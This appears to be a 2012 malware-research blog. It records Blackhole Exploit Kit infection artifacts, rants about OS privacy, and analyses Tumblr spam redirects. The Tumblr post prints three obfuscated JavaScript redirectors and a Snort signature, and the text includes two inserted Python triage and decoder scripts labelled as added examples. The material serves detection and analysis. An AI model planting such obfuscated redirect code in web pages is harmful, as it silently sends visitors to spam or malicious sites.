Tuesday, December 4, 2012

Blackhole Exploit Kit Observations

Hey all,

Been doing a bit of research, and I've found some interesting correlations with the BEK.  First off, I'll be looking at three separate incidents:

Oct 22 2012 - Microsoft Support spoofed emails
Oct 23 2012 - LinkedIn spoofed emails
Dec 4 2012 - US Airways spoofed emails

The method of infection is pretty much the same and well documented...click the link, and your flash/reader/java versions are checked, then exploited.  After that, usually Zeus or Cridex is installed and your machine starts talking to their C&C servers.  It's this point that I'm looking at.  There are some variances, but the general flow seems to be:

Exploited java creates:
C:\Documents and Settings\username\wgsdgsdgdsgsd.exe

Internet Explorer creates:
C:\DOCUME~1\username\LOCALS~1\Temp\wpbt0.dll

wpbt0.dll creates (and starts) a secondary downloaded executable file
or
wgsdgsdgdsgsd.exe creates (and starts) a secondary downloaded executable file, usually a KB00random#s.exe
 
File C:\Documents and Settings\username\Application Data\94B3EB7A and Registry Key HKCU\Software\Microsoft\Windows NT\S94B3EB7A are created.  This entry is what I believe to be the list of banks and sites to steal your data and has some interesting bits:


File C:\Documents and Settings\jlay\Local Settings\Temporary Internet Files\Content.IE5\<random>\AjX0[1].txt is created.  This file I believe is encrypted and portions of it are sent to the C&C server:


I suspect this file contains information about your machine/user info/etc.  In two cases this file was close to 100kB, in the last case it was over 440kB!

For reboot survival, key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\KB00729045.exe is created.

Lastly, wgsdgsdgdsgsd.exe and wpbt0.dll create a couple of .bat files that attempt to delete a few files:
C:\Documents and Settings\username\Local Settings\Temp\exp3.tmp.bat
C:\Documents and Settings\username\Local Settings\Temp\exp1.tmp.bat
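Turning the artifact chain above into a host triage check, as an added example (not from the original post): the matchers generalise the single sample the post gives for each artifact, so treating the ID as 8 hex digits, the Run value as KB00 plus digits and the cleanup scripts as expN.tmp.bat is an assumption, and the inventory it runs on is constructed.

```python
import re

# Matchers for the host artifacts listed in this post, generalised from the one
# sample given above (94B3EB7A / S94B3EB7A, KB00729045.exe, wpbt0.dll, expN.tmp.bat).
RUN_VALUE = re.compile(r"^KB00\d+\.exe$", re.I)
ID_FILE = re.compile(r"\\Application Data\\([0-9A-F]{8})$", re.I)
ID_KEY = re.compile(r"^HKCU\\Software\\Microsoft\\Windows NT\\S([0-9A-F]{8})$", re.I)
TEMP_DLL = re.compile(r"\\Temp\\wpbt0\.dll$", re.I)
TMP_BAT = re.compile(r"\\Temp\\exp\d+\.tmp\.bat$", re.I)

def triage(files, run_values, reg_keys):
    """Match a host inventory against the chain above; return (kind, detail) pairs."""
    findings = []
    config_files = {}  # 8-hex ID -> the Application Data file that carries it
    for path in files:
        m = ID_FILE.search(path)
        if m:
            config_files[m.group(1).upper()] = path
        if TEMP_DLL.search(path):
            findings.append(("loader_dll", path))
        if TMP_BAT.search(path):
            findings.append(("cleanup_bat", path))
    for name in run_values:
        if RUN_VALUE.match(name):
            findings.append(("run_persistence", name))
    for key in reg_keys:
        m = ID_KEY.match(key)
        if m:  # the post's file and key share one ID; a matching pair is the strong signal
            ident = m.group(1).upper()
            kind = "config_pair" if ident in config_files else "config_key_only"
            findings.append((kind, ident))
    return findings

# Constructed inventory: the post's artifacts ("user" stands in for the username)
# plus benign decoys that must not fire.
SAMPLE_FILES = [
    r"C:\Documents and Settings\user\Application Data\94B3EB7A",
    r"C:\Documents and Settings\user\Application Data\Microsoft",
    r"C:\DOCUME~1\user\LOCALS~1\Temp\wpbt0.dll",
    r"C:\Documents and Settings\user\Local Settings\Temp\exp3.tmp.bat",
]
SAMPLE_RUN_VALUES = ["ctfmon.exe", "KB00729045.exe"]
SAMPLE_REG_KEYS = [
    r"HKCU\Software\Microsoft\Windows NT\S94B3EB7A",
    r"HKCU\Software\Microsoft\Windows NT\CurrentVersion",
]

if __name__ == "__main__":
    for kind, detail in triage(SAMPLE_FILES, SAMPLE_RUN_VALUES, SAMPLE_REG_KEYS):
        print(f"{kind:16} {detail}")
```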


Things I need to do:
Create a snort rule
Figure out how to decrypt the AjX0 files

Thanks.

Monday, November 19, 2012

The Sad State of the Modern OS

In today's lesson, we'll look at the following operating systems on an older Mac Mini (2 GHz, 2 gigs of RAM):


Our first contestant:  OS X Mountain Lion

Apple has decided that OS X Mountain Lion won't run on this device.  Technically game over, but for poops and giggles let's look at some nuggets from a device that it DOES run on:

Some of OS X's processes flat out refuse to use whatever proxy settings you've hard set in your Network settings, and will fail if you attempt to proxy transparently (Dictation).  Why is that?  I suspect it's because of this:

"When you use the keyboard dictation feature on your computer, the things you dictate will be recorded and sent to Apple to convert what you say into text. Your computer will also send Apple other information, such as your first name and nickname; and the names, nicknames, and relationship with you (for example, “my dad”) of your address book contacts."

The "such as" is especially exciting...I'm betting it's far more, and Apple doesn't want you to see it, hence the proxy fail.

In Lion, most of your jazz (contacts, notes, etc...) sync'd via iTunes to your iPhone and life was good.  In Mountain Lion, Apple has removed that and now you MUST use iCloud.  Have you LOOKED at the iCloud privacy statement?  Some tidbits below:

To provide such features or services, where available, Apple and its partners and licensors must collect, use, transmit, process and maintain your location data, including but not limited to the geographic location of your device and information related to your iCloud account (“Account”) and any devices registered thereunder, including but not limited to your Apple ID, device ID and name, and device type.

When you create an Apple ID, register your products, apply for commercial credit, purchase a product, download a software update, register for a class at an Apple Retail Store, or participate in an online survey, we may collect a variety of information, including your name, mailing address, phone number, email address, contact preferences, and credit card information.

When you share your content with family and friends using Apple products, send gift certificates and products, or invite others to join you on Apple forums, Apple may collect the information you provide about those people such as name, mailing address, email address, and phone number.

In the U.S., we may ask for your Social Security number (SSN) but only in limited circumstances such as when setting up a wireless account and activating your iPhone or when determining whether to extend commercial credit.

We also use personal information to help us develop, deliver, and improve our products, services, content, and advertising.

We may collect information such as occupation, language, zip code, area code, unique device identifier, location, and the time zone where an Apple product is used so that we can better understand customer behavior and improve our products, services, and advertising.

As is true of most websites, we gather some information automatically and store it in log files. This information includes Internet Protocol (IP) addresses, browser type and language, Internet service provider (ISP), referring and exit pages, operating system, date/time stamp, and clickstream data.

We use this information to understand and analyze trends, to administer the site, to learn about user behavior on the site, and to gather demographic information about our user base as a whole. Apple may use this information in our marketing and advertising services.


Yea pass thanks.  Apple is forcing you to use their service so they can sell your info...nice.  Fail..and done with OS X!

Next up, Ubuntu 12.10 Client!

One of the staples of Linux is the fact that you can throw it on just about anything and it will work, and work well.  Ubuntu 12.10 gives a fat "shove it" to that notion.  Ubuntu 12.10 on this same Mac Mini fails to work with the aging Intel 945GM graphics card (the ancient 1024x768 is the max res you'll get).  This "modern OS" was released just last month, yet can't see my card.  A fresh install from a 2009 Windows 7 CD, not even SP1, and Windows sees the card and gives me full resolution right out of the gate.  WTH.  Couple this with the shameless (and insecure) bundling of desktop search with Amazon (link here) and this OS is a fail.

NEXT

Windows 8

Now I must admit that Windows 8 is worse than I thought it would be :)  Taking a cue from Apple, certain processes will happily disregard your proxy settings and go direct to the Net.  Again, why is that?  It's not to hide their in-app advertisements (link here), those are bad enough (this is my DESKTOP OPERATING SYSTEM, NOT MY PHONE).  I have yet to try and transparently proxy the traffic to see what it's doing.  And then there's the new Store...a shameless (and late) copy of Apple's Store.  Come to think of it, isn't the whole Metro UI about...5 years late if they wanted to be like Apple?  Fail.


And there it is!  So what's a tech person to do when the big three of OS's are going in directions that are technically questionable, clearly made for the masses, and seem hell bent on acquiring (and selling) my data?  It's a sad way. 

Friday, June 29, 2012

Tumblr Redirects

Recently I've been seeing spam like the message shown below:

Your inbox is full of surprises from a special someone. You should go check it out now. To receive this special gift, View Here

Sent from Yahoo! Mail on Android


The "View Here" link goes to addresses such as the following (one of them went through the t.co URL shortener before landing on Tumblr):
kmghoshk.tumblr.com
wcmxztol.tumblr.com

These pages contain the obfuscated JavaScript below:
var dnc='http'; var ghmr='://e'; function ertryu(wnz,hfy){return wnz+hfy} var ndnkkl=ertryu(dnc,ghmr);var qvst='card'; var fcv='love'; function ikgofp(gtq,ojh){return gtq+ojh} var pdgfvt=ikgofp(qvst,fcv);var ymm='wis'; var zko='h.co'; function hgypvh(ocu,cln){return ocu+cln} var ehillv=hgypvh(ymm,zko);var jah='m/?'; var wlo='6QBc'; var ehjh='kb'; function iatyan(rcw,dgi,ygk){return rcw+dgi+ygk} var hjgfam=iatyan(jah,wlo,ehjh); var kwzkgy=ndnkkl+pdgfvt+ehillv+hjgfam; document.location = kwzkgy

var uvw='http'; var unn='://e'; function xoimr(qmn,cey){return qmn+cey} var opbsj=xoimr(uvw,unn);var jvgt='card'; var smo='lov'; function dbog(tzp,nqh){return tzp+nqh} var rvoa=dbog(jvgt,smo);var foi='ersw'; var rth='ish'; function qzhlg(uwu,mrg){return uwu+mrg} var wtzdi=qzhlg(foi,rth);var hqzh='.com'; var vrly='/?C'; function shfq(fgk,yom){return fgk+yom} var vzby=shfq(hqzh,vrly);var dih='qdve'; var ibt='e'; function rdetyd(xep,itr){return xep+itr} var ybvpit=rdetyd(dih,ibt); var vaybau=opbsj+rvoa+wtzdi+vzby+ybvpit; document.location = vaybau

These decode to links pointing to:
hxxp://ecardlovewish.com/?6QBckb

Which in turn go to silly dating sites (iHookup, ScoreNextDoor, etc…)

Update 1:
The bad guys have added an additional method for this:
var bwl='htt'; var jwu='p://'; function relz(dgk,cpy){return dgk+cpy} var bgbr=relz(bwl,jwu);var daih='ecar'; var zpd='d3-'; function eettgr(xyl,too){return xyl+too} var sdiocl=eettgr(daih,zpd);var xand='love'; var max='r.co'; function sccfhz(krs,mre){return krs+mre} var abbghb=sccfhz(xand,max);var khd='m/?5'; var esd='Mzo'; var zcl='GyEy'; function frmy(jxx,sbe,onn){return jxx+sbe+onn} var qpyj=frmy(khd,esd,zcl); var otoa=bgbr+sdiocl+abbghb+qpyj; document.location = otoa

The below Snort sig should match both of these now:
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"WEB-CLIENT Tumblr spam redirect"; flow:from_server; file_data; content:"='htt"; content:"://"; within: 15; metadata:policy security-ips drop, service http; classtype:bad-unknown; sid:10000014; reference:url,malwareandmore.blogspot.com/2012/06/tumblr-redirects.html; rev:2;)
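As an added example (not part of the original post), a static decoder for the concatenation pattern shared by all three scripts above, including the Update 1 variant: it resolves the final document.location string without executing any JavaScript, so the redirect target can be read off safely. The inputs are the three scripts quoted in this post.

```python
import re

# One alternative per statement shape in the redirector scripts quoted above:
# string literal, helper function, helper call, plain concatenation, sink.
_STMT = re.compile(r"""
    var\s+(?P<sv>\w+)\s*=\s*'(?P<str>[^']*)'
  | function\s+(?P<fn>\w+)\((?P<params>[\w\s,]*)\)\s*\{\s*return\s+(?P<body>[\w\s+]+?)\s*\}
  | var\s+(?P<cv>\w+)\s*=\s*(?P<callee>\w+)\((?P<args>[\w\s,]*)\)
  | var\s+(?P<xv>\w+)\s*=\s*(?P<expr>\w+(?:\s*\+\s*\w+)+)
  | document\.location\s*=\s*(?P<sink>\w+)
""", re.VERBOSE)

def _terms(expr):
    return [t.strip() for t in expr.split("+")]

def resolve_redirect(js):
    """Statically evaluate the script and return the URL it would redirect to.
    Nothing is executed: string variables live in a dict and each helper is
    reduced to the parameter names it concatenates. Unhandled shapes raise."""
    env, funcs = {}, {}
    for m in _STMT.finditer(js):
        if m.group("sv") is not None:
            env[m.group("sv")] = m.group("str")
        elif m.group("fn") is not None:
            params = [p.strip() for p in m.group("params").split(",")]
            funcs[m.group("fn")] = (params, _terms(m.group("body")))
        elif m.group("cv") is not None:
            params, body = funcs[m.group("callee")]
            local = dict(zip(params, [env[a.strip()] for a in m.group("args").split(",")]))
            env[m.group("cv")] = "".join(local[t] for t in body)
        elif m.group("xv") is not None:
            env[m.group("xv")] = "".join(env[t] for t in _terms(m.group("expr")))
        else:
            return env[m.group("sink")]
    raise ValueError("no document.location assignment found")

# The three scripts quoted in this post, verbatim.
SAMPLES = [
    "var dnc='http'; var ghmr='://e'; function ertryu(wnz,hfy){return wnz+hfy} var ndnkkl=ertryu(dnc,ghmr);var qvst='card'; var fcv='love'; function ikgofp(gtq,ojh){return gtq+ojh} var pdgfvt=ikgofp(qvst,fcv);var ymm='wis'; var zko='h.co'; function hgypvh(ocu,cln){return ocu+cln} var ehillv=hgypvh(ymm,zko);var jah='m/?'; var wlo='6QBc'; var ehjh='kb'; function iatyan(rcw,dgi,ygk){return rcw+dgi+ygk} var hjgfam=iatyan(jah,wlo,ehjh); var kwzkgy=ndnkkl+pdgfvt+ehillv+hjgfam; document.location = kwzkgy",
    "var uvw='http'; var unn='://e'; function xoimr(qmn,cey){return qmn+cey} var opbsj=xoimr(uvw,unn);var jvgt='card'; var smo='lov'; function dbog(tzp,nqh){return tzp+nqh} var rvoa=dbog(jvgt,smo);var foi='ersw'; var rth='ish'; function qzhlg(uwu,mrg){return uwu+mrg} var wtzdi=qzhlg(foi,rth);var hqzh='.com'; var vrly='/?C'; function shfq(fgk,yom){return fgk+yom} var vzby=shfq(hqzh,vrly);var dih='qdve'; var ibt='e'; function rdetyd(xep,itr){return xep+itr} var ybvpit=rdetyd(dih,ibt); var vaybau=opbsj+rvoa+wtzdi+vzby+ybvpit; document.location = vaybau",
    "var bwl='htt'; var jwu='p://'; function relz(dgk,cpy){return dgk+cpy} var bgbr=relz(bwl,jwu);var daih='ecar'; var zpd='d3-'; function eettgr(xyl,too){return xyl+too} var sdiocl=eettgr(daih,zpd);var xand='love'; var max='r.co'; function sccfhz(krs,mre){return krs+mre} var abbghb=sccfhz(xand,max);var khd='m/?5'; var esd='Mzo'; var zcl='GyEy'; function frmy(jxx,sbe,onn){return jxx+sbe+onn} var qpyj=frmy(khd,esd,zcl); var otoa=bgbr+sdiocl+abbghb+qpyj; document.location = otoa",
]

def decode_all(samples=SAMPLES):
    return [resolve_redirect(s) for s in samples]

if __name__ == "__main__":
    for url in decode_all():
        print(url.replace("http", "hxxp", 1))  # defanged, as the post writes them
```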